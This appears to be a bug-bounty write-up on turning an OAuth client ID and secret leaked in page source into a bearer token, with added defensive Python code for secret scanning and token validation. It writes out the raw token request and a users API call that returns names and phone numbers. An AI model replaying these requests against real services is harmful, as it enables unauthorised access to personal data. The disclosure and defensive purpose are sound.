Forging OAuth tokens using discovered client id and client secret

Below is a short story about a leaked OAuth client ID and client secret that I found in the page source and that let me generate tokens I was never meant to hold.

Recon:

{
  "ENV": "prod",
  "SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
  "SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
  "MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
  "MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
  "SERVICE_OAUTH_CLIENT_API_VERSION": "v2"
};

Disclaimer: all values were replaced.
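The check that should have caught this before the build shipped: scan client-side assets for config keys whose names mark them as secrets. The scanner below is an added example, not code from the write-up or from the affected site; the sample page source is constructed from the placeholder config above, wrapped in a script tag the way a frontend build would inline it, and the key-name pattern is an assumption about what a team would consider a secret.

```python
import re

# Key names whose values should never be shipped in client-side assets.
SECRET_KEY_PATTERN = re.compile(r"SECRET|PRIVATE_KEY|PASSWORD|API_KEY|TOKEN", re.IGNORECASE)
# Quoted "KEY": "value" pairs, as found in JSON or JS config objects inlined into HTML.
KV_PATTERN = re.compile(r'"([A-Za-z0-9_.\-]+)"\s*:\s*"([^"]*)"')


def find_exposed_secrets(page_source, min_length=16):
    """Return a list of (key, value) pairs whose key name marks them as secrets.

    Works on raw page source rather than json.loads(), so surrounding HTML and
    JavaScript (such as the trailing '};' of an assignment) do not break it.
    The length floor skips empty or trivial values such as "" or "v2".
    """
    hits = []
    for key, value in KV_PATTERN.findall(page_source):
        if SECRET_KEY_PATTERN.search(key) and len(value) >= min_length:
            hits.append((key, value))
    return hits


def redact(value):
    """Keep only the first and last characters so a finding can be matched to a
    credential store without reproducing the secret in a report."""
    if len(value) <= 8:
        return "***"
    return value[:4] + "..." + value[-2:]


# Constructed page source: the write-up's placeholder config wrapped in a
# <script> tag the way a frontend build would inline it.
SAMPLE_PAGE = """
<script>
window.__CONFIG__ = {
"ENV": "prod",
"SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
"SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
"MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
"MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
"SERVICE_OAUTH_CLIENT_API_VERSION": "v2"
};
</script>
"""

if __name__ == "__main__":
    # Run over the constructed page: flags the two *_CLIENT_SECRET entries only.
    for key, value in find_exposed_secrets(SAMPLE_PAGE):
        print(f"EXPOSED {key} = {redact(value)}")
```

Running this against built JS bundles in CI (and against the rendered HTML of each deployed page) turns the recon step above into a pre-release gate; a client secret that appears in anything served to a browser must be treated as public and rotated.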

What is OAuth?

OAuth is an open-standard authorization protocol or framework that gives applications the ability for “secure designated access.” For example, you can tell Facebook that it’s OK for Instagram to access your profile or post updates to your story without having to give Instagram your Facebook password. This minimizes risk in a major way: in the event that Instagram suffers a breach, your Facebook password remains safe.

Client Credentials Flow:

  1. Your app authenticates with the Auth0 Authorization Server using its Client ID and Client Secret (/oauth/token endpoint).
  2. Your Auth0 Authorization Server validates the Client ID and Client Secret.
  3. Your Auth0 Authorization Server responds with an Access Token.
  4. Your application can use the Access Token to call an API on behalf of itself.
  5. The API responds with the requested data.
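Steps 1 to 3 of that flow, written out as an added example that is not part of the write-up and not Auth0's code: the client builds the Basic header from its ID and secret, and the authorization server parses it, checks the secret against a stored hash in constant time, and issues a token. The client registry, the dummy hash and the opaque token format are assumptions made for the example; the registered credentials are the placeholder values from the recon section.

```python
import base64
import hashlib
import hmac
import secrets
import urllib.parse


def hash_secret(client_secret):
    """Servers store a hash of the client secret, never the secret itself."""
    return hashlib.sha256(client_secret.encode("utf-8")).hexdigest()


# Constructed client registry keyed by client_id. The credentials are the
# placeholder values from the write-up, not real ones.
CLIENT_REGISTRY = {
    "mvaxns1234gahnbnjkdfsasdgyjkuigv": hash_secret("2a548s56-as84-d8fg-asd5-ahsndksj12sh"),
}
# Compared against when the client_id is unknown, so the response time does not
# differ between "unknown client" and "wrong secret".
_DUMMY_HASH = hash_secret("dummy-value-for-unknown-clients")


def make_basic_header(client_id, client_secret):
    """Step 1: the client_secret_basic encoding from RFC 6749 section 2.3.1
    (form-urlencode each part, join with ':', then base64)."""
    pair = urllib.parse.quote(client_id, safe="") + ":" + urllib.parse.quote(client_secret, safe="")
    return "Basic " + base64.b64encode(pair.encode("utf-8")).decode("ascii")


def parse_basic_header(header_value):
    """Inverse of make_basic_header. Returns (client_id, client_secret), or None
    when the header is missing or malformed. This is encoding, not encryption:
    anyone who can read the header can recover both values."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic" or not encoded.strip():
        return None
    try:
        raw = base64.b64decode(encoded.strip(), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    client_id, sep, client_secret = raw.partition(":")
    if not sep:
        return None
    return urllib.parse.unquote(client_id), urllib.parse.unquote(client_secret)


def handle_token_request(headers, form):
    """Steps 2 and 3: validate the client and issue an access token.
    Returns (http_status, response_body) as the /oauth/token endpoint would."""
    if form.get("grant_type") != "client_credentials":
        return 400, {"error": "unsupported_grant_type"}
    creds = parse_basic_header(headers.get("Authorization", ""))
    if creds is None:
        return 401, {"error": "invalid_client"}
    client_id, client_secret = creds
    stored = CLIENT_REGISTRY.get(client_id)
    # Constant-time comparison, executed even when the id is unknown.
    matches = hmac.compare_digest(stored or _DUMMY_HASH, hash_secret(client_secret))
    if stored is None or not matches:
        return 401, {"error": "invalid_client"}
    # Opaque random token; a production server would issue a JWT bound to client_id.
    return 200, {
        "token_type": "bearer",
        "access_token": secrets.token_urlsafe(32),
        "expires_in": 3600,
    }


if __name__ == "__main__":
    header = make_basic_header("mvaxns1234gahnbnjkdfsasdgyjkuigv", "2a548s56-as84-d8fg-asd5-ahsndksj12sh")
    print(handle_token_request({"Authorization": header}, {"grant_type": "client_credentials"}))
```

The server side has no way to tell a legitimate backend from anyone else holding the same ID and secret; that is the whole design of the grant, which is why the secret may only ever live server-side and why the fix for a leak is rotation plus a review of every token the token endpoint issued to that client_id in the meantime.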

Let’s try to use these credentials.

Exploit:

There are two ways to include the credentials in your calls: as an HTTP header, or as a query string parameter.

I used the HTTP header method.

Authorization: Basic <base64(client_id:client_secret)>

The Client Credentials grant type is used by clients to obtain an access token outside of the context of a user.

POST /{identity url}/oauth/v1/token HTTP/1.1
Host: site.com
Authorization: Basic ehajnnsmnshjaknsjilkmnshtghjklikjWlOTno6VXdsQSgdhjnsmkjdhfbnnmkjshbnbhahsjkkluyhsghbshjnmkdjhead==
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

grant_type=client_credentials

HTTP/1.1 200 OK
Date: Thu, 05 May 2022 21:15:28 GMT
Content-Type: application/json
Content-Length: 1008
Connection: close
Cache-Control: no-cache, no-store, no-transform

{"token_type":"bearer","access_token":"eyJ0[…redacted…]"}

I got back a JWT token.

We can use it to pull data like this:

POST /api/v1/users HTTP/1.1
Host: site.com
Authorization: Bearer eyJ0[…redacted…]
Content-Type: application/x-www-form-urlencoded

HTTP/1.1 200 OK
[...]
[
  {
    "username": "Name",
    "id": "BLALALALA",
    "phone": "21254488"
  },
  {
    "username": "Name",
    "id": "BLALALALA",
    "phone": "21254488"
  }
]

I reported the vulnerability, and they accepted it as a high :).

Basyouni

Cyber Security Engineer & Penetration Tester | Bug Bounty Hunter